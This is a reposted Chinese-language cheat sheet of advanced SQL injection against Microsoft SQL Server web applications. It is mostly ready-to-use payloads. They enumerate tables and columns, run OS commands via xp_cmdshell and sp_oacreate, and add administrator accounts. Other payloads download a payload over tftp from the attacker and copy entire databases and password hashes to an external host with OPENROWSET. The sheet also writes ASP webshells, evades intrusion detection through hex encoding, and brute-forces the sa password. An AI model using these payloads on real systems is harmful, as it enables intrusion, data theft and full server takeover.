Mssql高階注入筆記(轉)

Mssql高階注入筆記(轉)[@more@]Sql注射總結（早源於’or’1’=’1） 最重要的表名： select * from sysobjects sysobjects ncsysobjects sysindexes tsysindexes syscolumns systypes sysusers sysdatabases sysxlogins sysprocesses 最重要的一些使用者名稱（預設sql資料庫中存在著的） public dbo guest(一般禁止，或者沒許可權) db_sercurityadmin ab_dlladmin 一些預設擴充套件 xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite xp_availablemedia 驅動器相關 xp_dirtree 目錄 xp_enumdsn ODBC連線 xp_loginconfig 伺服器安全模式資訊 xp_makecab 建立壓縮卷 xp_ntsec_enumdomains domain資訊 xp_terminate_process 終端程式，給出一個PID 例如： sp_addextendedproc ’xp_webserver’, ’c:/temp/xp_foo.dll’ exec xp_webserver sp_dropextendedproc ’xp_webserver’ bcp "select * FROM test..foo" queryout c:/inetpub/wwwroot/runcommand.asp -c -Slocalhost -Usa -Pfoobar ’ group by users.id having 1=1- ’ group by users.id, users.username, users.password, users.privs having 1=1- ’; insert into users values( 666, ’attacker’, ’foobar’, 0xffff )- union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’- union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’ where COLUMN_NAME NOT IN (’login_id’)- union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=’logintable’ where COLUMN_NAME NOT IN (’login_id’,’login_name’)- union select TOP 1 login_name FROM logintable- union select TOP 1 password FROM logintable where login_name=’Rahul’-- 構造語句：查詢是否存在xp_cmdshell ’ union select @@version,1,1,1-- and 1=(select @@VERSION) and ’sa’=(select System_user) ’ union select ret,1,1,1 from foo-- ’ union select min(username),1,1,1 from users where username > ’a’- ’ union select min(username),1,1,1 from users where username > ’admin’- ’ union select password,1,1,1 from users where username = ’admin’-- and user_name()=’dbo’ and 0<>(select user_name()- ; DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C：/WINNT/system32/cmd.exe /c net user swap 5245886 /add’ and 1=(select count(*) FROM master.dbo.sysobjects where xtype = ’X’ AND name = ’xp_cmdshell’) ;EXEC master.dbo.sp_addextendedproc ’xp_cmdshell’, ’xplog70.dll’ 1=(%20select%20count(*)%20from%20master.dbo.sysobjects%20where%20xtype=’x’%20and%20name=’xp_cmdshell’) and 1=(select IS_SRVROLEMEMBER(’sysadmin’)) 判斷sa許可權是否 and 0<>(select top 1 paths from newtable)-- 暴庫大法 and 1=(select name from master.dbo.sysdatabases where dbid=7) 得到庫名（從1到5都是系統的id，6以上才可以判斷） 建立一個虛擬目錄E盤： declare @o int exec sp_oacreate ’wscript.shell’, @o out exec sp_oamethod @o, ’run’, NULL,’ cscript.exe c：/inetpub/wwwroot/mkwebdir.vbs -w "預設 Web 站點" -v "e","e：/"’ 訪問屬性：（配合寫入一個webshell） declare @o int exec sp_oacreate ’wscript.shell’, @o out exec sp_oamethod @o, ’run’, NULL,’ cscript.exe c：/inetpub/wwwroot/chaccess.vbs -a w3svc/1/ROOT/e +browse’ and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) 依次提交 dbid = 7,8,9.... 得到更多的資料庫名 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’) 暴到一個表 假設為 admin and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’ and name not in (’Admin’)) 來得到其他的表。 and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=’U’ and name=’admin’ and uid>(str(id))) 暴到UID的數值假設為18779569 uid=id and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) 得到一個admin的一個欄位,假設為 user_id and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in (’id’,...)) 來暴出其他的欄位 and 01) 可以得到使用者名稱 依次可以得到密碼。。。。。假設存在user_id username ,password 等欄位 Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin Show.asp?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union語句到處風靡啊，access也好用 暴庫特殊技巧：:%5c=’/’ 或者把/和/ 修改%5提交 and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’) 得到表名 and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=’U’ and name not in(’Address’)) and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=’U’ and name=’admin’ and uid>(str(id))) 判斷id值 and 0<>(select top 1 name from BBS.dbo.syscolumns where id=773577794) 所有欄位 table [dbo].[swap] ([swappass][char](255));-- and (select top 1 swappass from swap)=1 ;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=’HKEY_LOCAL_MACHINE’, @key=’SYSTEM/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots/’, @value_name=’/’, values=@test OUTPUT insert into paths(path) values(@test) 政策法規&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"wscript.shell",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"cmd.exe%20/c%20ping%201.1.1.1";-- 得到了web路徑d:/xxxx,接下來： ku1;-- table cmd (str image);-- 傳統的存在xp_cmdshell的測試過程： ;exec master..xp_cmdshell ’dir’ ;exec master.dbo.sp_addlogin hax;-- ;exec master.dbo.sp_password null,hax,hax;-- ;exec master.dbo.sp_addsrvrolemember hax sysadmin;-- ;exec master.dbo.xp_cmdshell ’net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add’;-- ;exec master.dbo.xp_cmdshell ’net localgroup administrators hax /add’;-- exec master..xp_servicecontrol ’start’, ’schedule’ exec master..xp_servicecontrol ’start’, ’server’ http：// DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C：/WINNT/system32/cmd.exe /c net user swap 5258 /add’ ;DECLARE @shell INT EXEC SP_OAcreate ’wscript.shell’,@shell OUTPUT EXEC SP_OAMETHOD @shell,’run’,null, ’C：/WINNT/system32/cmd.exe /c net localgroup administrators swap/add’ exec master..xp_cmdshell ’tftp -i youip get file.exe’- declare @a sysname set @a=’xp_’+’cmdshell’ exec @a ’dir c:/’ declare @a sysname set @a=’xp’+’_cm’+’dshell’ exec @a ’dir c:/’ ;declare @a;set @a=db_name();backup database @a to disk=’你的IP你的共享目錄bak.dat’ 如果被限制則可以。 select * from openrowset(’sqloledb’,’server’;’sa’;’’,’select ’’OK!’’ exec master.dbo.sp_addlogin hax’) 傳統查詢構造： select * FROM news where id=... AND topic=... AND ..... admin’and 1=(select count(*) from [user] where username=’victim’ and right(left(userpass,01),1)=’1’) and userpass <>’ select 123;-- ;use master;-- :a’ or name like ’fff%’;-- 顯示有一個叫ffff的使用者哈。 ’and 1<>(select count(email) from [user]);-- ;update [users] set email=(select top 1 name from sysobjects where xtype=’u’ and status>0) where name=’ffff’;-- 說明: 上面的語句是得到資料庫中的第一個使用者表,並把表名放在ffff使用者的郵箱欄位中。 透過檢視ffff的使用者資料可得第一個用表叫ad 然後根據表名ad得到這個表的ID ffff’;update [users] set email=(select top 1 id from sysobjects where xtype=’u’ and name=’ad’) where name=’ffff’;-- 象下面這樣就可以得到第二個表的名字了 ffff’;update [users] set email=(select top 1 name from sysobjects where xtype=’u’ and id>581577110) where name=’ffff’;-- ffff’;update [users] set email=(select top 1 count(id) from password) where name=’ffff’;-- ffff’;update [users] set email=(select top 1 pwd from password where id=2) where name=’ffff’;-- ffff’;update [users] set email=(select top 1 name from password where id=2) where name=’ffff’;-- exec master..xp_servicecontrol ’start’, ’schedule’ exec master..xp_servicecontrol ’start’, ’server’ sp_addextendedproc ’xp_webserver’, ’c:/temp/xp_foo.dll’ 擴充套件儲存就可以透過一般的方法呼叫： exec xp_webserver 一旦這個擴充套件儲存執行過，可以這樣刪除它: sp_dropextendedproc ’xp_webserver’ insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)- insert into users values( 667,123,123,0xffff)- insert into users values ( 123, ’admin’’--’, ’password’, 0xffff)- ;and user>0 ;;and (select count(*) from sysobjects)>0 ;;and (select count(*) from mysysobjects)>0 //為access資料庫 -----------------------------------------------------------通常注射的一些介紹： A) ID=49 這類注入的引數是數字型，SQL語句原貌大致如下： select * from 表名 where 欄位=49 注入的引數為ID=49 And [查詢條件]，即是生成語句： select * from 表名 where 欄位=49 And [查詢條件] (B) Class=連續劇 這類注入的引數是字元型，SQL語句原貌大致概如下： select * from 表名 where 欄位=’連續劇’ 注入的引數為Class=連續劇’ and [查詢條件] and ’’=’ ，即是生成語句： select * from 表名 where 欄位=’連續劇’ and [查詢條件] and ’’=’’ (C) 搜尋時沒過濾引數的，如keyword=關鍵字，SQL語句原貌大致如下： select * from 表名 where 欄位like ’%關鍵字%’ 注入的引數為keyword=’ and [查詢條件] and ’%25’=’， 即是生成語句： select * from 表名 where欄位like ’%’ and [查詢條件] and ’%’=’%’ ;;and (select Top 1 name from sysobjects where xtype=’U’ and status>0)>0 sysobjects是SQLServer的系統表，儲存著所有的表名、檢視、約束及其它物件，xtype=’U’ and status>0，表示使用者建立的表名，上面的語句將第一個表名取出，與0比較大小，讓報錯資訊把表名暴露出來。 ;;and (select Top 1 col_name(object_id(’表名’),1) from sysobjects)>0 從⑤拿到表名後，用object_id(’表名’)獲取表名對應的內部ID，col_name(表名ID,1)代表該表的第1個欄位名，將1換成2,3,4...就可以逐個獲取所猜解表裡面的欄位名。 post.htm內容：主要是方便輸入。

0);--" name=id> >>">

列舉出他的資料表名： id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);-- 這是將第一個表名更新到aaa的欄位處。 讀出第一個表，第二個表可以這樣讀出來（在條件後加上 and name<>’剛才得到的表名’）。 id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0 and name<>’vote’);-- 然後id=1552 and exists(select * from aaa where aaa>5) 讀出第二個表，^^^^^^一個個的讀出，直到沒有為止。 讀欄位是這樣： id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),1));-- 然後id=1552 and exists(select * from aaa where aaa>5)出錯，得到欄位名 id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),2));-- 然後id=1552 and exists(select * from aaa where aaa>5)出錯，得到欄位名 --------------------------------高階技巧： [獲得資料表名][將欄位值更新為表名，再想法讀出這個欄位的值就可得到表名] update 表名 set 欄位=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>’你得到的表名’ 查出一個加一個]) [ where 條件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(’table1’,’table2’,…) 透過SQLSERVER注入漏洞建資料庫管理員帳號和系統管理員帳號[當前帳號必須是SYSADMIN組] [獲得資料表欄位名][將欄位值更新為欄位名，再想法讀出這個欄位的值就可得到欄位名] update 表名 set 欄位=(select top 1 col_name(object_id(’要查詢的資料表名’),欄位列如:1) [ where 條件] 繞過IDS的檢測[使用變數] declare @a sysname set @a=’xp_’+’cmdshell’ exec @a ’dir c:/’ declare @a sysname set @a=’xp’+’_cm’+’dshell’ exec @a ’dir c:/’ 1、 開啟遠端資料庫 基本語法 select * from OPENROWSET(’SQLOLEDB’, ’server=servername;uid=sa;pwd=apachy_123’, ’select * from table1’ ) 引數: (1) OLEDB Provider name 2、 其中連線字串引數可以是任何和埠用來連線,比如 select * from OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table’ 要複製目標主機的整個資料庫，首先要在目標主機上和自己機器上的資料庫建立連線(如何在目標主機上建立遠端連線，剛才已經講了),之後insert所有遠端表到本地表。 基本語法： insert into OPENROWSET(’SQLOLEDB’, ’server=servername;uid=sa;pwd=apachy_123’, ’select * from table1’) select * from table2 這行語句將目標主機上table2表中的所有資料複製到遠端資料庫中的table1表中。實際運用中適當修改連線字串的IP地址和埠，指向需要的地方，比如： insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table1’) select * from table2 insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _sysdatabases’) select * from master.dbo.sysdatabases insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=hack3r;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _sysobjects’) select * from user_database.dbo.sysobjects insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _syscolumns’) select * from user_database.dbo.syscolumns 之後，便可以從本地資料庫中看到目標主機的庫結構，這已經易如反掌，不多講，複製資料庫： insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table1’) select * from database..table1 insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from table2’) select * from database..table2 ...... 3、 複製哈西表（HASH） 這實際上是上述複製資料庫的一個擴充套件應用。登入密碼的hash儲存於sysxlogins中。方法如下： insert into OPENROWSET(’SQLOLEDB’, ’uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’, ’select * from _sysxlogins’) select * from database.dbo.sysxlogins 得到hash之後，就可以進行暴力破解。這需要一點運氣和大量時間。 遍歷目錄的方法： 先建立一個臨時表：temp 5’;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 5’;insert temp exec master.dbo.xp_availablemedia;-- 獲得當前所有驅動器 5’;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 獲得子目錄列表 5’;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 獲得所有子目錄的目錄樹結構,並寸入temp表中 5’;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 檢視某個檔案的內容 5’;insert into temp(id) exec master.dbo.xp_cmdshell ’dir c:/’;-- 5’;insert into temp(id) exec master.dbo.xp_cmdshell ’dir c:/ *.asp /s/a’;-- 5’;insert into temp(id) exec master.dbo.xp_cmdshell ’cscript C:/Inetpub/AdminScripts/adsutil.vbs enum w3svc’ 5’;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- （xp_dirtree適用許可權PUBLIC） 寫入表： 語句1：　and　1=(select IS_SRVROLEMEMBER(’sysadmin’));-- 語句2：　and　1=(select IS_SRVROLEMEMBER(’serveradmin’));-- 語句3：　and　1=(select IS_SRVROLEMEMBER(’setupadmin’));-- 語句4：　and　1=(select IS_SRVROLEMEMBER(’securityadmin’));-- 語句5：　and　1=(select IS_SRVROLEMEMBER(’securityadmin’));-- 語句6：　and　1=(select IS_SRVROLEMEMBER(’diskadmin’));-- 語句7：　and　1=(select IS_SRVROLEMEMBER(’bulkadmin’));-- 語句8：　and　1=(select IS_SRVROLEMEMBER(’bulkadmin’));-- 語句9：　and　1=(select IS_MEMBER(’db_owner’));-- 把路徑寫到表中去： 　table　dirs(paths varchar(100), id int)- 　dirs　exec　master.dbo.xp_dirtree ’c:/’- 　and　0<>(select　top　1　paths　from　dirs)- 　and　0<>(select　top　1　paths　from　dirs　where　paths　not　in(’@Inetpub’))- 語句：　table　dirs1(paths　varchar(100),　id　int)-- 語句：　dirs　exec　master.dbo.xp_dirtree ’e:/web’-- 語句：　and　0<>(select　top　1　paths　from　dirs1)- 把資料庫備份到網頁目錄：下載 　@a　sysname;　set　@a=db_name();backup　database　@a　to　disk=’e:/web/down.bak’;-- and%201=(select%20top%201%20name%20from(select%20top%2012%20id,name%20from%20sysobjects%20where%20xtype=char(85))%20T%20order%20by%20id%20desc) and%201=(select%20Top%201%20col_name(object_id(’USER_LOGIN’),1)%20from%20sysobjects) 參看相關表。 and 1=(select%20user_id%20from%20USER_LOGIN) and%200=(select%20user%20from%20USER_LOGIN%20where%20user>1) 如果可以透過連線符註釋掉後面的驗證，那麼就更有意思了，來看我們能作什麼： a、在使用者名稱位置輸入【admin’;exec master.dbo.sp_addlogin Cool;--】，新增一個sql使用者 b、在使用者名稱位置輸入【admin’;exec master.dbo.sp_password null,123456,Cool;--】，給Cool設定密碼為123456 c、在使用者名稱位置輸入【admin’;exec master.dbo.sp_addsrvrolemember Cool,sysadmin;--】，給Cool賦予System Administrator許可權 一些sql擴充套件 xp_regaddmultistring xp_regdeletekey 刪除鍵名 xp_regdeletevalue 刪除鍵值 xp_regenumkeys 列舉 xp_regenumvalues xp_regread 對於 xp_regremovemultistring xp_regwrite 寫 xp_availablemedia 檢視驅動器 xp_dirtree 看目錄 xp_enumdsn ODBC資料來源 xp_loginconfig 一些伺服器安全配置的資訊 xp_makecab 打包，某些dbo許可權先可做大用 xp_ntsec_enumdomains 列舉域名相關資訊 xp_terminate_process 終端程式和ip啦 xp_logininfo 當前登入帳號 sp_configure 檢索資料庫中的內容（我覺得這個挺有用的） sp_helpextendedproc 得到所有的儲存擴充套件 sp_who2 查詢使用者，他們登入的主機，他們在資料庫中執行的操作等等 一些網路資訊 exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM/CurrentControlSet/Services/lanmanserver/parameters', 'nullsessionshares' SNMP輔助網路踩點 exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM/CurrentControlSet/Services/snmp/parameters/validcomm unities' 開始一些系統服務,比如telnet，前提希望可以跑來admin或者一些系統密碼 exec master..xp_servicecontrol 'start', 'schedule' exec master..xp_servicecontrol 'start', 'server' Sp_addextendedproc 'xp_webserver','c:/temp/xp_foo.dll' 此擴充套件可以執行程式 使用'bulk insert'語法可以將一個文字檔案插入到一個臨時表中。簡單地建立這個表： create table foo( line varchar(8000) ) 然後執行bulk insert操作把檔案中的資料插入到表中，如： bulk insert foo from 'c:/inetpub/wwwroot/admin/inc.asp' bcp "select * from text..foo" queryout c:/inetpub/wwwroot/runcommand.asp –c -Slocalhost –Usa –Pfoobar 'S'引數為執行查詢的伺服器，'U'引數為使用者名稱，'P'引數為密碼，這裡為'foobar' SQL SERVER中提供了幾個內建的允許建立ActiveX自動執行指令碼的儲存過程。這些指令碼和執行在windows指令碼直譯器下的指令碼，或者ASP指令碼程式一樣——他們使用VBScript或JavaScript書寫，他們建立自動執行物件並和它們互動。一個自動執行指令碼使用這種方法書寫可以在Transact-SQL中做任何在ASP指令碼中，或者WSH指令碼中可以做的任何事情 使用'wscript.shell'物件建立了一個記事本的例項： declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'notepad.exe' 指定在使用者名稱後面來執行它： Username：'; declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'notepad.exe'— 使用FSO讀一個已知的文字檔案： declare @o int, @f int, @t int, @ret int declare @line varchar(8000) exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'opentextfile', @f out, 'c:/boot.ini', 1 exec @ret = sp_oamethod @f, 'readline', @line out while( @ret = 0 ) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end 建立了一個能執行透過提交的命令，預設是asp那組許可權的使用者下執行，前提是sp_oacreate擴充套件存在 declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:/inetpub/wwwroot/foo.asp', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, '' sp_who '1' select * from sysobjects 針對區域網滲透,備份拖庫或者非sa使用者 declare @a sysname;set @a=db_name();backup database @a to disk=你的IP你的共享目錄bak.dat ,name=test;-- 當前資料庫就備份到你的硬碟上了 select * from openrowset(sqloledb,myserver;sa;,select * from table) 回連，預設需要支援多語句查詢 新增登入，使其成為固定伺服器角色的成員。 語法 sp_addsrvrolemember [ @loginame = ] 'login' [@rolename =] 'role' 引數 [@loginame =] 'login' 是新增到固定伺服器角色的登入名稱。login 的資料型別為 sysname，沒有預設值。login 可以是 Microsoft? SQL Server? 登入或 Microsoft Windows NT? 使用者帳戶。如果還沒有對該 Windows NT 登入授予 SQL Server 訪問許可權，那麼將自動對其授予訪問許可權。 [@rolename =] 'role' 要將登入新增到的固定伺服器角色的名稱。role 的資料型別為 sysname，預設值為 NULL，它必須是下列值之一： sysadmin securityadmin serveradmin setupadmin processadmin diskadmin dbcreator bulkadmin 返回程式碼值 0（成功）或 1（失敗） 註釋 在將登入新增到固定伺服器角色時，該登入就會得到與此固定伺服器角色相關的許可權。 不能更改 sa 登入的角色成員資格。 請使用 sp_addrolemember 將成員新增到固定資料庫角色或使用者定義的角色。 不能在使用者定義的事務內執行 sp_addsrvrolemember 儲存過程。 許可權 sysadmin 固定伺服器的成員可以將成員新增到任何固定伺服器角色。固定伺服器角色的成員可以執行 sp_addsrvrolemember 將成員只新增到同一個固定伺服器角色。 示例 下面的示例將 Windows NT 使用者 Corporate/HelenS 新增到 sysadmin 固定伺服器角色中。 EXEC sp_addsrvrolemember 'Corporate/HelenS', 'sysadmin' OPENDATASOURCE 不使用連結的伺服器名，而提供特殊的連線資訊，並將其作為四部分物件名的一部分。 語法 OPENDATASOURCE ( provider_name, init_string ) 引數 provider_name 註冊為用於訪問資料來源的 OLE DB 提供程式的 PROGID 的名稱。provider_name 的資料型別為 char，沒有預設值。 init_string 連線字串，這些字串將要傳遞給目標提供程式的 IDataInitialize 介面。提供程式字串語法是以關鍵字值對為基礎的，這些關鍵字值對由分號隔開，例如："keyword1=value; keyword2=value." 在 Microsoft? Data Access SDK 中定義了基本語法。有關所支援的特定關鍵字值對的資訊，請參見提供程式中的文件。下表列出 init_string 引數中最常用的關鍵字。 關鍵字 OLE DB 屬性 有效值和描述 資料來源 DBPROP_INIT_DATASOURCE 要連線的資料來源的名稱。不同的提供程式用不同的方法對此進行解釋。對於 SQL Server OLE DB 提供程式來說，這會指明伺服器的名稱。對於 Jet OLE DB 提供程式來說，這會指明 .mdb 檔案或 .xls 檔案的完整路徑。 位置 DBPROP_INIT_LOCATION 要連線的資料庫的位置。 擴充套件屬性 DBPROP_INIT_PROVIDERSTRING 提供程式特定的連線字串。 連線超時 DBPROP_INIT_TIMEOUT 超時值，在該超時值後，連線嘗試將失敗。 使用者 ID DBPROP_AUTH_USERID 用於該連線的使用者 ID。 密碼 DBPROP_AUTH_PASSWORD 用於該連線的密碼。 目錄 DBPROP_INIT_CATALOG 連線到資料來源時的初始或預設的目錄名稱。 OPENDATASOURCE 函式可以在能夠使用連結伺服器名的相同 Transact-SQL 語法位置中使用。因此，就可以將 OPENDATASOURCE 用作四部分名稱的第一部分，該名稱指的是 SELECT、INSERT、UPDATE 或 DELETE 語句中的表或檢視的名稱；或者指的是 EXECUTE 語句中的遠端儲存過程。當執行遠端儲存過程時，OPENDATASOURCE 應該指的是另一個 SQL Server。OPENDATASOURCE 不接受引數變數。 與 OPENROWSET 函式類似，OPENDATASOURCE 應該只引用那些不經常訪問的 OLE DB 資料來源。對於訪問次數稍多的任何資料來源，請為它們定義連結的伺服器。無論 OPENDATASOURCE 還是 OPENROWSET 都不能提供連結的伺服器定義的全部功能，例如，安全管理以及查詢目錄資訊的能力。每次呼叫 OPENDATASOURCE 時，都必須提供所有的連線資訊（包括密碼）。 示例 下面的示例訪問來自某個表的資料，該表在 SQL Server 的另一個例項中。 SELECT * FROM OPENDATASOURCE( 'SQLOLEDB', 'Data Source=ServerName;User ID=MyUID;Password=MyPass' ).Northwind.dbo.Categories 下面是個查詢的示例，它透過用於 Jet 的 OLE DB 提供程式查詢 Excel 電子表格。 SELECT * FROM OpenDataSource( 'Microsoft.Jet.OLEDB.4.0', 'Data Source="c:/Finance/account.xls";User ID=Admin;Password=;Extended properties=Excel 5.0')...xactions 針對MSDASQL 用儲存過程建立的sql連線，在blackbox測試中，好象沒什麼注入區別 declare @username nvarchar(4000), @query nvarchar(4000) declare @pwd nvarchar(4000), @char_set nvarchar(4000) declare @pwd_len int, @i int, @c char select @char_set = N'abcdefghijklmnopqrstuvwxyz0123456789!_' select @pwd_len = 8 select @username = 'sa' while @i < @pwd_len begin -- make pwd (code deleted) -- try a login select @query = N'select * from OPENROWSET(''MSDASQL'',''DRIVER={SQL Server};SERVER=;uid=' + @username + N';pwd=' + @pwd + N''',''select @@version'')' exec xp_execresultset @query, N'master' --check for success (code deleted) -- increment the password (code deleted) end 盲注技巧之一，時間延緩（可以加一個迴圈函式，執行查詢時間越久說說明當前欄位正確） if (select user) = 'sa' waitfor delay '0:0:5' if exists (select * from pubs..pub_info) waitfor delay '0:0:5' create table pubs..tmp_file (is_file int, is_dir int, has_parent int) insert into pubs..tmp_file exec master..xp_fileexist 'c:/boot.ini' if exists (select * from pubs..tmp_file) waitfor delay '0:0:5' if (select is_file from pubs..tmp_file) > 0 waitfor delay '0:0:5' 字元對比 if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5' declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 0))) > 0 waitfor delay '0:0:5' declare @s varchar(8000) select @s = db_name() if (ascii(substring(@s, 1, 1)) & ( power(2, 1))) > 0 waitfor delay '0:0:5' 編碼的秘密，饒過IDS declare @q varchar(8000) select @q = 0x73656c65637420404076657273696f6e exec(@q) This runs 'select @@version', as does: declare @q nvarchar(4000) select @q = 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) In the stored procedure example above we saw how a 'sysname' parameter can contain multiple SQL statements without the use of single quotes or semicolons: sp_msdropretry [foo drop table logs select * from sysobjects], [bar]